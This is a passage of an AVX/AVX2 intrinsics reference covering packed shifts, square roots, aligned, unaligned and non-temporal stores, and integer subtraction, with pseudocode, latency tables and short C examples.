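    __m256i sign = _mm256_set_epi16(1, -1, 0, 1, -1, 0, 1, -1,
                                    0, 1, -1, 0, 1, -1, 0, 1);

    /* Copy, negate or zero each word of a according to the sign of 'sign'. */
    __m256i r = _mm256_sign_epi16(a, sign);

    /* Negates exactly the negative words of a, i.e. a cheap abs(). */
    __m256i abs_like = _mm256_sign_epi16(a, a);

    short out[16];
    _mm256_storeu_si256((__m256i *)out, r);
    printf("r[0]=%d r[1]=%d r[2]=%d\n", out[0], out[1], out[2]); /* -7 0 7 */

    _mm256_storeu_si256((__m256i *)out, abs_like);
    printf("abs_like[0]=%d\n", out[0]);                          /* 7 */
    return 0;
}
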
vpsllw
__m256i _mm256_sll_epi16 (__m256i a, __m128i count)

Synopsis

__m256i _mm256_sll_epi16 (__m256i a, __m128i count)
#include «immintrin.h»
Instruction: vpsllw ymm, ymm, xmm
CPUID Flags: AVX2

Description

Shift packed 16-bit integers in a left by count while shifting in zeros, and store the results in dst.

Operation

FOR j := 0 to 15 i := j*16 IF count[63:0] > 15 dst[i+15:i] := 0 ELSE dst[i+15:i] := ZeroExtend(a[i+15:i] << count[63:0]) FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 4 0.5
vpslld
__m256i _mm256_sll_epi32 (__m256i a, __m128i count)

Synopsis

__m256i _mm256_sll_epi32 (__m256i a, __m128i count)
#include «immintrin.h»
Instruction: vpslld ymm, ymm, xmm
CPUID Flags: AVX2

Description

Shift packed 32-bit integers in a left by count while shifting in zeros, and store the results in dst.

Operation

FOR j := 0 to 7 i := j*32 IF count[63:0] > 31 dst[i+31:i] := 0 ELSE dst[i+31:i] := ZeroExtend(a[i+31:i] << count[63:0]) FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 4 0.5
vpsllq
__m256i _mm256_sll_epi64 (__m256i a, __m128i count)

Synopsis

__m256i _mm256_sll_epi64 (__m256i a, __m128i count)
#include «immintrin.h»
Instruction: vpsllq ymm, ymm, xmm
CPUID Flags: AVX2

Description

Shift packed 64-bit integers in a left by count while shifting in zeros, and store the results in dst.

Operation

FOR j := 0 to 3 i := j*64 IF count[63:0] > 63 dst[i+63:i] := 0 ELSE dst[i+63:i] := ZeroExtend(a[i+63:i] << count[63:0]) FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 4 0.5
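
For the vpsllw/vpslld/vpsllq forms above, the shift amount is taken from the low 64 bits of an XMM register and applies to every element. A small sketch (assumes -mavx2):

#include <immintrin.h>
#include <stdio.h>

int main(void) {
    __m256i v = _mm256_set1_epi32(3);

    /* _mm_cvtsi32_si128 zero-extends a scalar count into an XMM register. */
    __m128i count = _mm_cvtsi32_si128(4);

    __m256i r = _mm256_sll_epi32(v, count);   /* every element: 3 << 4 = 48 */

    int out[8];
    _mm256_storeu_si256((__m256i *)out, r);
    printf("%d\n", out[0]);   /* prints 48 */
    return 0;
}
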
vpsllw
__m256i _mm256_slli_epi16 (__m256i a, int imm8)

Synopsis

__m256i _mm256_slli_epi16 (__m256i a, int imm8)
#include «immintrin.h»
Instruction: vpsllw ymm, ymm, imm
CPUID Flags: AVX2

Description

Shift packed 16-bit integers in a left by imm8 while shifting in zeros, and store the results in dst.

Operation

FOR j := 0 to 15 i := j*16 IF imm8[7:0] > 15 dst[i+15:i] := 0 ELSE dst[i+15:i] := ZeroExtend(a[i+15:i] << imm8[7:0]) FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpslld
__m256i _mm256_slli_epi32 (__m256i a, int imm8)

Synopsis

__m256i _mm256_slli_epi32 (__m256i a, int imm8)
#include «immintrin.h»
Instruction: vpslld ymm, ymm, imm
CPUID Flags: AVX2

Description

Shift packed 32-bit integers in a left by imm8 while shifting in zeros, and store the results in dst.

Operation

FOR j := 0 to 7 i := j*32 IF imm8[7:0] > 31 dst[i+31:i] := 0 ELSE dst[i+31:i] := ZeroExtend(a[i+31:i] << imm8[7:0]) FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpsllq
__m256i _mm256_slli_epi64 (__m256i a, int imm8)

Synopsis

__m256i _mm256_slli_epi64 (__m256i a, int imm8)
#include «immintrin.h»
Instruction: vpsllq ymm, ymm, imm
CPUID Flags: AVX2

Description

Shift packed 64-bit integers in a left by imm8 while shifting in zeros, and store the results in dst.

Operation

FOR j := 0 to 3 i := j*64 IF imm8[7:0] > 63 dst[i+63:i] := 0 ELSE dst[i+63:i] := ZeroExtend(a[i+63:i] << imm8[7:0]) FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpslldq
__m256i _mm256_slli_si256 (__m256i a, const int imm8)

Synopsis

__m256i _mm256_slli_si256 (__m256i a, const int imm8)
#include «immintrin.h»
Instruction: vpslldq ymm, ymm, imm
CPUID Flags: AVX2

Description

Shift 128-bit lanes in a left by imm8 bytes while shifting in zeros, and store the results in dst.

Operation

tmp := imm8[7:0] IF tmp > 15 tmp := 16 FI dst[127:0] := a[127:0] << (tmp*8) dst[255:128] := a[255:128] << (tmp*8) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
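
The byte shift operates on each 128-bit lane independently, so bytes never move from the low lane into the high lane. A sketch that makes the lane boundary visible (assumes -mavx2):

#include <immintrin.h>
#include <stdio.h>

int main(void) {
    /* byte i of v holds the value i */
    __m256i v = _mm256_set_epi8(31, 30, 29, 28, 27, 26, 25, 24,
                                23, 22, 21, 20, 19, 18, 17, 16,
                                15, 14, 13, 12, 11, 10, 9, 8,
                                7, 6, 5, 4, 3, 2, 1, 0);

    __m256i r = _mm256_slli_si256(v, 4);   /* shift each lane left by 4 bytes */

    unsigned char out[32];
    _mm256_storeu_si256((__m256i *)out, r);
    /* Zeros enter at the bottom of *both* lanes: bytes 12..15 of the low
       lane are discarded rather than carried into the high lane. */
    printf("%d %d %d %d\n", out[3], out[5], out[16], out[20]); /* 0 1 0 16 */
    return 0;
}
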
vpsllvd
__m128i _mm_sllv_epi32 (__m128i a, __m128i count)

Synopsis

__m128i _mm_sllv_epi32 (__m128i a, __m128i count)
#include «immintrin.h»
Instruction: vpsllvd xmm, xmm, xmm
CPUID Flags: AVX2

Description

Shift packed 32-bit integers in a left by the amount specified by the corresponding element in count while shifting in zeros, and store the results in dst.

Operation

FOR j := 0 to 3 i := j*32 dst[i+31:i] := ZeroExtend(a[i+31:i] << count[i+31:i]) ENDFOR dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 2 2
vpsllvd
__m256i _mm256_sllv_epi32 (__m256i a, __m256i count)

Synopsis

__m256i _mm256_sllv_epi32 (__m256i a, __m256i count)
#include «immintrin.h»
Instruction: vpsllvd ymm, ymm, ymm
CPUID Flags: AVX2

Description

Shift packed 32-bit integers in a left by the amount specified by the corresponding element in count while shifting in zeros, and store the results in dst.

Operation

FOR j := 0 to 7 i := j*32 dst[i+31:i] := ZeroExtend(a[i+31:i] << count[i+31:i]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 2 2
vpsllvq
__m128i _mm_sllv_epi64 (__m128i a, __m128i count)

Synopsis

__m128i _mm_sllv_epi64 (__m128i a, __m128i count)
#include «immintrin.h»
Instruction: vpsllvq xmm, xmm, xmm
CPUID Flags: AVX2

Description

Shift packed 64-bit integers in a left by the amount specified by the corresponding element in count while shifting in zeros, and store the results in dst.

Operation

FOR j := 0 to 1 i := j*64 dst[i+63:i] := ZeroExtend(a[i+63:i] << count[i+63:i]) ENDFOR dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpsllvq
__m256i _mm256_sllv_epi64 (__m256i a, __m256i count)

Synopsis

__m256i _mm256_sllv_epi64 (__m256i a, __m256i count)
#include «immintrin.h»
Instruction: vpsllvq ymm, ymm, ymm
CPUID Flags: AVX2

Description

Shift packed 64-bit integers in a left by the amount specified by the corresponding element in count while shifting in zeros, and store the results in dst.

Operation

FOR j := 0 to 3 i := j*64 dst[i+63:i] := ZeroExtend(a[i+63:i] << count[i+63:i]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
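
Unlike the imm/xmm-count forms, the vpsllvd/vpsllvq variants take a separate shift count per element. A minimal sketch (assumes -mavx2) building powers of two:

#include <immintrin.h>
#include <stdio.h>

int main(void) {
    __m256i v      = _mm256_set1_epi32(1);
    __m256i counts = _mm256_set_epi32(7, 6, 5, 4, 3, 2, 1, 0);

    /* Each 32-bit element gets its own shift count: dst[j] = 1 << j here. */
    __m256i r = _mm256_sllv_epi32(v, counts);

    int out[8];
    _mm256_storeu_si256((__m256i *)out, r);
    for (int i = 0; i < 8; i++) printf("%d ", out[i]);
    printf("\n");   /* prints: 1 2 4 8 16 32 64 128 */
    return 0;
}
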
vsqrtpd
__m256d _mm256_sqrt_pd (__m256d a)

Synopsis

__m256d _mm256_sqrt_pd (__m256d a)
#include «immintrin.h»
Instruction: vsqrtpd ymm, ymm
CPUID Flags: AVX

Description

Compute the square root of packed double-precision (64-bit) floating-point elements in a, and store the results in dst.

Operation

FOR j := 0 to 3 i := j*64 dst[i+63:i] := SQRT(a[i+63:i]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 35 28
Ivy Bridge 35 28
Sandy Bridge 43 44
vsqrtps
__m256 _mm256_sqrt_ps (__m256 a)

Synopsis

__m256 _mm256_sqrt_ps (__m256 a)
#include «immintrin.h»
Instruction: vsqrtps ymm, ymm
CPUID Flags: AVX

Description

Compute the square root of packed single-precision (32-bit) floating-point elements in a, and store the results in dst.

Operation

FOR j := 0 to 7 i := j*32 dst[i+31:i] := SQRT(a[i+31:i]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 21 14
Ivy Bridge 21 14
Sandy Bridge 29 28
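
A minimal sketch for the packed square root (assumes -mavx; the single-precision form computes eight roots per instruction):

#include <immintrin.h>
#include <stdio.h>

int main(void) {
    __m256 v = _mm256_set_ps(64, 49, 36, 25, 16, 9, 4, 1);
    __m256 r = _mm256_sqrt_ps(v);   /* element-wise square root */

    float out[8];
    _mm256_storeu_ps(out, r);
    for (int i = 0; i < 8; i++) printf("%g ", out[i]);
    printf("\n");   /* prints: 1 2 3 4 5 6 7 8 */
    return 0;
}
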
vpsraw
__m256i _mm256_sra_epi16 (__m256i a, __m128i count)

Synopsis

__m256i _mm256_sra_epi16 (__m256i a, __m128i count)
#include «immintrin.h»
Instruction: vpsraw ymm, ymm, xmm
CPUID Flags: AVX2

Description

Shift packed 16-bit integers in a right by count while shifting in sign bits, and store the results in dst.

Operation

FOR j := 0 to 15 i := j*16 IF count[63:0] > 15 dst[i+15:i] := SignBit ELSE dst[i+15:i] := SignExtend(a[i+15:i] >> count[63:0]) FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 4
vpsrad
__m256i _mm256_sra_epi32 (__m256i a, __m128i count)

Synopsis

__m256i _mm256_sra_epi32 (__m256i a, __m128i count)
#include «immintrin.h»
Instruction: vpsrad ymm, ymm, xmm
CPUID Flags: AVX2

Description

Shift packed 32-bit integers in a right by count while shifting in sign bits, and store the results in dst.

Operation

FOR j := 0 to 7 i := j*32 IF count[63:0] > 31 dst[i+31:i] := SignBit ELSE dst[i+31:i] := SignExtend(a[i+31:i] >> count[63:0]) FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 4
vpsraw
__m256i _mm256_srai_epi16 (__m256i a, int imm8)

Synopsis

__m256i _mm256_srai_epi16 (__m256i a, int imm8)
#include «immintrin.h»
Instruction: vpsraw ymm, ymm, imm
CPUID Flags: AVX2

Description

Shift packed 16-bit integers in a right by imm8 while shifting in sign bits, and store the results in dst.

Operation

FOR j := 0 to 15 i := j*16 IF imm8[7:0] > 15 dst[i+15:i] := SignBit ELSE dst[i+15:i] := SignExtend(a[i+15:i] >> imm8[7:0]) FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpsrad
__m256i _mm256_srai_epi32 (__m256i a, int imm8)

Synopsis

__m256i _mm256_srai_epi32 (__m256i a, int imm8)
#include «immintrin.h»
Instruction: vpsrad ymm, ymm, imm
CPUID Flags: AVX2

Description

Shift packed 32-bit integers in a right by imm8 while shifting in sign bits, and store the results in dst.

Operation

FOR j := 0 to 7 i := j*32 IF imm8[7:0] > 31 dst[i+31:i] := SignBit ELSE dst[i+31:i] := SignExtend(a[i+31:i] >> imm8[7:0]) FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpsravd
__m128i _mm_srav_epi32 (__m128i a, __m128i count)

Synopsis

__m128i _mm_srav_epi32 (__m128i a, __m128i count)
#include «immintrin.h»
Instruction: vpsravd xmm, xmm, xmm
CPUID Flags: AVX2

Description

Shift packed 32-bit integers in a right by the amount specified by the corresponding element in count while shifting in sign bits, and store the results in dst.

Operation

FOR j := 0 to 3 i := j*32 dst[i+31:i] := SignExtend(a[i+31:i] >> count[i+31:i]) ENDFOR dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 2
vpsravd
__m256i _mm256_srav_epi32 (__m256i a, __m256i count)

Synopsis

__m256i _mm256_srav_epi32 (__m256i a, __m256i count)
#include «immintrin.h»
Instruction: vpsravd ymm, ymm, ymm
CPUID Flags: AVX2

Description

Shift packed 32-bit integers in a right by the amount specified by the corresponding element in count while shifting in sign bits, and store the results in dst.

Operation

FOR j := 0 to 7 i := j*32 dst[i+31:i] := SignExtend(a[i+31:i] >> count[i+31:i]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 2
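
The difference between the arithmetic shifts above and the logical shifts documented further below is what gets shifted in for negative values. A short sketch (assumes -mavx2):

#include <immintrin.h>
#include <stdio.h>

int main(void) {
    __m256i v = _mm256_set1_epi32(-16);

    __m256i arith = _mm256_srai_epi32(v, 2);  /* shifts in sign bits: -4 */
    __m256i logic = _mm256_srli_epi32(v, 2);  /* shifts in zeros        */

    int out[8];
    _mm256_storeu_si256((__m256i *)out, arith);
    printf("arithmetic: %d\n", out[0]);             /* -4 */
    _mm256_storeu_si256((__m256i *)out, logic);
    printf("logical:    %u\n", (unsigned)out[0]);   /* 1073741820 */
    return 0;
}
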
vpsrlw
__m256i _mm256_srl_epi16 (__m256i a, __m128i count)

Synopsis

__m256i _mm256_srl_epi16 (__m256i a, __m128i count)
#include «immintrin.h»
Instruction: vpsrlw ymm, ymm, xmm
CPUID Flags: AVX2

Description

Shift packed 16-bit integers in a right by count while shifting in zeros, and store the results in dst.

Operation

FOR j := 0 to 15 i := j*16 IF count[63:0] > 15 dst[i+15:i] := 0 ELSE dst[i+15:i] := ZeroExtend(a[i+15:i] >> count[63:0]) FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 4
vpsrld
__m256i _mm256_srl_epi32 (__m256i a, __m128i count)

Synopsis

__m256i _mm256_srl_epi32 (__m256i a, __m128i count)
#include «immintrin.h»
Instruction: vpsrld ymm, ymm, xmm
CPUID Flags: AVX2

Description

Shift packed 32-bit integers in a right by count while shifting in zeros, and store the results in dst.

Operation

FOR j := 0 to 7 i := j*32 IF count[63:0] > 31 dst[i+31:i] := 0 ELSE dst[i+31:i] := ZeroExtend(a[i+31:i] >> count[63:0]) FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 4
vpsrlq
__m256i _mm256_srl_epi64 (__m256i a, __m128i count)

Synopsis

__m256i _mm256_srl_epi64 (__m256i a, __m128i count)
#include «immintrin.h»
Instruction: vpsrlq ymm, ymm, xmm
CPUID Flags: AVX2

Description

Shift packed 64-bit integers in a right by count while shifting in zeros, and store the results in dst.

Operation

FOR j := 0 to 3 i := j*64 IF count[63:0] > 63 dst[i+63:i] := 0 ELSE dst[i+63:i] := ZeroExtend(a[i+63:i] >> count[63:0]) FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 4
vpsrlw
__m256i _mm256_srli_epi16 (__m256i a, int imm8)

Synopsis

__m256i _mm256_srli_epi16 (__m256i a, int imm8)
#include «immintrin.h»
Instruction: vpsrlw ymm, ymm, imm
CPUID Flags: AVX2

Description

Shift packed 16-bit integers in a right by imm8 while shifting in zeros, and store the results in dst.

Operation

FOR j := 0 to 15 i := j*16 IF imm8[7:0] > 15 dst[i+15:i] := 0 ELSE dst[i+15:i] := ZeroExtend(a[i+15:i] >> imm8[7:0]) FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpsrld
__m256i _mm256_srli_epi32 (__m256i a, int imm8)

Synopsis

__m256i _mm256_srli_epi32 (__m256i a, int imm8)
#include «immintrin.h»
Instruction: vpsrld ymm, ymm, imm
CPUID Flags: AVX2

Description

Shift packed 32-bit integers in a right by imm8 while shifting in zeros, and store the results in dst.

Operation

FOR j := 0 to 7 i := j*32 IF imm8[7:0] > 31 dst[i+31:i] := 0 ELSE dst[i+31:i] := ZeroExtend(a[i+31:i] >> imm8[7:0]) FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpsrlq
__m256i _mm256_srli_epi64 (__m256i a, int imm8)

Synopsis

__m256i _mm256_srli_epi64 (__m256i a, int imm8)
#include «immintrin.h»
Instruction: vpsrlq ymm, ymm, imm
CPUID Flags: AVX2

Description

Shift packed 64-bit integers in a right by imm8 while shifting in zeros, and store the results in dst.

Operation

FOR j := 0 to 3 i := j*64 IF imm8[7:0] > 63 dst[i+63:i] := 0 ELSE dst[i+63:i] := ZeroExtend(a[i+63:i] >> imm8[7:0]) FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpsrldq
__m256i _mm256_srli_si256 (__m256i a, const int imm8)

Synopsis

__m256i _mm256_srli_si256 (__m256i a, const int imm8)
#include «immintrin.h»
Instruction: vpsrldq ymm, ymm, imm
CPUID Flags: AVX2

Description

Shift 128-bit lanes in a right by imm8 bytes while shifting in zeros, and store the results in dst.

Operation

tmp := imm8[7:0] IF tmp > 15 tmp := 16 FI dst[127:0] := a[127:0] >> (tmp*8) dst[255:128] := a[255:128] >> (tmp*8) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpsrlvd
__m128i _mm_srlv_epi32 (__m128i a, __m128i count)

Synopsis

__m128i _mm_srlv_epi32 (__m128i a, __m128i count)
#include «immintrin.h»
Instruction: vpsrlvd xmm, xmm, xmm
CPUID Flags: AVX2

Description

Shift packed 32-bit integers in a right by the amount specified by the corresponding element in count while shifting in zeros, and store the results in dst.

Operation

FOR j := 0 to 3 i := j*32 dst[i+31:i] := ZeroExtend(a[i+31:i] >> count[i+31:i]) ENDFOR dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 2
vpsrlvd
__m256i _mm256_srlv_epi32 (__m256i a, __m256i count)

Synopsis

__m256i _mm256_srlv_epi32 (__m256i a, __m256i count)
#include «immintrin.h»
Instruction: vpsrlvd ymm, ymm, ymm
CPUID Flags: AVX2

Description

Shift packed 32-bit integers in a right by the amount specified by the corresponding element in count while shifting in zeros, and store the results in dst.

Operation

FOR j := 0 to 7 i := j*32 dst[i+31:i] := ZeroExtend(a[i+31:i] >> count[i+31:i]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 2
vpsrlvq
__m128i _mm_srlv_epi64 (__m128i a, __m128i count)

Synopsis

__m128i _mm_srlv_epi64 (__m128i a, __m128i count)
#include «immintrin.h»
Instruction: vpsrlvq xmm, xmm, xmm
CPUID Flags: AVX2

Description

Shift packed 64-bit integers in a right by the amount specified by the corresponding element in count while shifting in zeros, and store the results in dst.

Operation

FOR j := 0 to 1 i := j*64 dst[i+63:i] := ZeroExtend(a[i+63:i] >> count[i+63:i]) ENDFOR dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpsrlvq
__m256i _mm256_srlv_epi64 (__m256i a, __m256i count)

Synopsis

__m256i _mm256_srlv_epi64 (__m256i a, __m256i count)
#include «immintrin.h»
Instruction: vpsrlvq ymm, ymm, ymm
CPUID Flags: AVX2

Description

Shift packed 64-bit integers in a right by the amount specified by the corresponding element in count while shifting in zeros, and store the results in dst.

Operation

FOR j := 0 to 3 i := j*64 dst[i+63:i] := ZeroExtend(a[i+63:i] >> count[i+63:i]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
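
As with the left shifts, the vpsrlvd/vpsrlvq forms take a per-element count; a typical use is dividing unsigned values by per-element powers of two. A minimal sketch (assumes -mavx2):

#include <immintrin.h>
#include <stdio.h>

int main(void) {
    __m256i v      = _mm256_set1_epi32(256);
    __m256i counts = _mm256_set_epi32(8, 7, 6, 5, 4, 3, 2, 1);

    /* Per-element logical right shift: divides each unsigned value by 2^count. */
    __m256i r = _mm256_srlv_epi32(v, counts);

    int out[8];
    _mm256_storeu_si256((__m256i *)out, r);
    for (int i = 0; i < 8; i++) printf("%d ", out[i]);
    printf("\n");   /* prints: 128 64 32 16 8 4 2 1 */
    return 0;
}
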
vmovapd
void _mm256_store_pd (double * mem_addr, __m256d a)

Synopsis

void _mm256_store_pd (double * mem_addr, __m256d a)
#include «immintrin.h»
Instruction: vmovapd m256, ymm
CPUID Flags: AVX

Description

Store 256-bits (composed of 4 packed double-precision (64-bit) floating-point elements) from a into memory. mem_addr must be aligned on a 32-byte boundary or a general-protection exception may be generated.

Operation

MEM[mem_addr+255:mem_addr] := a[255:0]
vmovaps
void _mm256_store_ps (float * mem_addr, __m256 a)

Synopsis

void _mm256_store_ps (float * mem_addr, __m256 a)
#include «immintrin.h»
Instruction: vmovaps m256, ymm
CPUID Flags: AVX

Description

Store 256-bits (composed of 8 packed single-precision (32-bit) floating-point elements) from a into memory. mem_addr must be aligned on a 32-byte boundary or a general-protection exception may be generated.

Operation

MEM[mem_addr+255:mem_addr] := a[255:0]
vmovdqa
void _mm256_store_si256 (__m256i * mem_addr, __m256i a)

Synopsis

void _mm256_store_si256 (__m256i * mem_addr, __m256i a)
#include «immintrin.h»
Instruction: vmovdqa m256, ymm
CPUID Flags: AVX

Description

Store 256-bits of integer data from a into memory. mem_addr must be aligned on a 32-byte boundary or a general-protection exception may be generated.

Operation

MEM[mem_addr+255:mem_addr] := a[255:0]
vmovupd
void _mm256_storeu_pd (double * mem_addr, __m256d a)

Synopsis

void _mm256_storeu_pd (double * mem_addr, __m256d a)
#include «immintrin.h»
Instruction: vmovupd m256, ymm
CPUID Flags: AVX

Description

Store 256-bits (composed of 4 packed double-precision (64-bit) floating-point elements) from a into memory. mem_addr does not need to be aligned on any particular boundary.

Operation

MEM[mem_addr+255:mem_addr] := a[255:0]
vmovups
void _mm256_storeu_ps (float * mem_addr, __m256 a)

Synopsis

void _mm256_storeu_ps (float * mem_addr, __m256 a)
#include «immintrin.h»
Instruction: vmovups m256, ymm
CPUID Flags: AVX

Description

Store 256-bits (composed of 8 packed single-precision (32-bit) floating-point elements) from a into memory. mem_addr does not need to be aligned on any particular boundary.

Operation

MEM[mem_addr+255:mem_addr] := a[255:0]
vmovdqu
void _mm256_storeu_si256 (__m256i * mem_addr, __m256i a)

Synopsis

void _mm256_storeu_si256 (__m256i * mem_addr, __m256i a)
#include «immintrin.h»
Instruction: vmovdqu m256, ymm
CPUID Flags: AVX

Description

Store 256-bits of integer data from a into memory. mem_addr does not need to be aligned on any particular boundary.

Operation

MEM[mem_addr+255:mem_addr] := a[255:0]
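
The aligned and unaligned store forms differ only in the alignment requirement on the destination. A small sketch (assumes GCC or Clang, which provide the aligned(32) attribute, and -mavx):

#include <immintrin.h>
#include <stdio.h>

int main(void) {
    float aligned[8] __attribute__((aligned(32)));   /* 32-byte aligned buffer */
    float unaligned[9];

    __m256 v = _mm256_set1_ps(1.5f);
    _mm256_store_ps(aligned, v);          /* requires 32-byte alignment */
    _mm256_storeu_ps(unaligned + 1, v);   /* any address is fine        */

    printf("%g %g\n", aligned[0], unaligned[1]);   /* 1.5 1.5 */
    return 0;
}
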
void _mm256_storeu2_m128 (float* hiaddr, float* loaddr, __m256 a)

Synopsis

void _mm256_storeu2_m128 (float* hiaddr, float* loaddr, __m256 a)
#include «immintrin.h»
CPUID Flags: AVX

Description

Store the high and low 128-bit halves (each composed of 4 packed single-precision (32-bit) floating-point elements) from a into two different 128-bit memory locations. hiaddr and loaddr do not need to be aligned on any particular boundary.

Operation

MEM[loaddr+127:loaddr] := a[127:0] MEM[hiaddr+127:hiaddr] := a[255:128]
void _mm256_storeu2_m128d (double* hiaddr, double* loaddr, __m256d a)

Synopsis

void _mm256_storeu2_m128d (double* hiaddr, double* loaddr, __m256d a)
#include «immintrin.h»
CPUID Flags: AVX

Description

Store the high and low 128-bit halves (each composed of 2 packed double-precision (64-bit) floating-point elements) from a into two different 128-bit memory locations. hiaddr and loaddr do not need to be aligned on any particular boundary.

Operation

MEM[loaddr+127:loaddr] := a[127:0] MEM[hiaddr+127:hiaddr] := a[255:128]
void _mm256_storeu2_m128i (__m128i* hiaddr, __m128i* loaddr, __m256i a)

Synopsis

void _mm256_storeu2_m128i (__m128i* hiaddr, __m128i* loaddr, __m256i a)
#include «immintrin.h»
CPUID Flags: AVX

Description

Store the high and low 128-bit halves (each composed of integer data) from a into two different 128-bit memory locations. hiaddr and loaddr do not need to be aligned on any particular boundary.

Operation

MEM[loaddr+127:loaddr] := a[127:0] MEM[hiaddr+127:hiaddr] := a[255:128]
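
The storeu2 helpers split one 256-bit register into two independent 128-bit stores, which is handy when the two halves go to unrelated buffers. A minimal sketch (assumes -mavx):

#include <immintrin.h>
#include <stdio.h>

int main(void) {
    __m256 v = _mm256_set_ps(8, 7, 6, 5, 4, 3, 2, 1);

    float lo[4], hi[4];
    _mm256_storeu2_m128(hi, lo, v);   /* low half to lo[], high half to hi[] */

    printf("lo: %g..%g  hi: %g..%g\n", lo[0], lo[3], hi[0], hi[3]); /* 1..4  5..8 */
    return 0;
}
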
vmovntdqa
__m256i _mm256_stream_load_si256 (__m256i const* mem_addr)

Synopsis

__m256i _mm256_stream_load_si256 (__m256i const* mem_addr)
#include «immintrin.h»
Instruction: vmovntdqa ymm, m256
CPUID Flags: AVX2

Description

Load 256-bits of integer data from memory into dst using a non-temporal memory hint. mem_addr must be aligned on a 32-byte boundary or a general-protection exception may be generated.

Operation

dst[255:0] := MEM[mem_addr+255:mem_addr] dst[MAX:256] := 0
vmovntpd
void _mm256_stream_pd (double * mem_addr, __m256d a)

Synopsis

void _mm256_stream_pd (double * mem_addr, __m256d a)
#include «immintrin.h»
Instruction: vmovntpd m256, ymm
CPUID Flags: AVX

Description

Store 256-bits (composed of 4 packed double-precision (64-bit) floating-point elements) from a into memory using a non-temporal memory hint. mem_addr must be aligned on a 32-byte boundary or a general-protection exception may be generated.

Operation

MEM[mem_addr+255:mem_addr] := a[255:0]
vmovntps
void _mm256_stream_ps (float * mem_addr, __m256 a)

Synopsis

void _mm256_stream_ps (float * mem_addr, __m256 a)
#include «immintrin.h»
Instruction: vmovntps m256, ymm
CPUID Flags: AVX

Description

Store 256-bits (composed of 8 packed single-precision (32-bit) floating-point elements) from a into memory using a non-temporal memory hint. mem_addr must be aligned on a 32-byte boundary or a general-protection exception may be generated.

Operation

MEM[mem_addr+255:mem_addr] := a[255:0]
vmovntdq
void _mm256_stream_si256 (__m256i * mem_addr, __m256i a)

Synopsis

void _mm256_stream_si256 (__m256i * mem_addr, __m256i a)
#include «immintrin.h»
Instruction: vmovntdq m256, ymm
CPUID Flags: AVX

Description

Store 256-bits of integer data from a into memory using a non-temporal memory hint. mem_addr must be aligned on a 32-byte boundary or a general-protection exception may be generated.

Operation

MEM[mem_addr+255:mem_addr] := a[255:0]
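
Non-temporal stores are typically used to fill large buffers that will not be read back soon, bypassing the cache. A sketch of such a fill routine (my illustration; the destination must be 32-byte aligned, n a multiple of 8, and the streaming stores are ordered with a store fence):

#include <immintrin.h>
#include <stddef.h>

void fill_nt(float *dst, float value, size_t n)
{
    __m256 v = _mm256_set1_ps(value);
    for (size_t i = 0; i < n; i += 8)
        _mm256_stream_ps(dst + i, v);   /* non-temporal: does not pollute the cache */
    _mm_sfence();                       /* order the streaming stores */
}
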
vpsubw
__m256i _mm256_sub_epi16 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_sub_epi16 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpsubw ymm, ymm, ymm
CPUID Flags: AVX2

Description

Subtract packed 16-bit integers in b from packed 16-bit integers in a, and store the results in dst.

Operation

FOR j := 0 to 15 i := j*16 dst[i+15:i] := a[i+15:i] - b[i+15:i] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpsubd
__m256i _mm256_sub_epi32 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_sub_epi32 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpsubd ymm, ymm, ymm
CPUID Flags: AVX2

Description

Subtract packed 32-bit integers in b from packed 32-bit integers in a, and store the results in dst.

Operation

FOR j := 0 to 7 i := j*32 dst[i+31:i] := a[i+31:i] - b[i+31:i] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpsubq
__m256i _mm256_sub_epi64 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_sub_epi64 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpsubq ymm, ymm, ymm
CPUID Flags: AVX2

Description

Subtract packed 64-bit integers in b from packed 64-bit integers in a, and store the results in dst.

Operation

FOR j := 0 to 3 i := j*64 dst[i+63:i] := a[i+63:i] - b[i+63:i] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpsubb
__m256i _mm256_sub_epi8 (__m256i a, __m256i b)
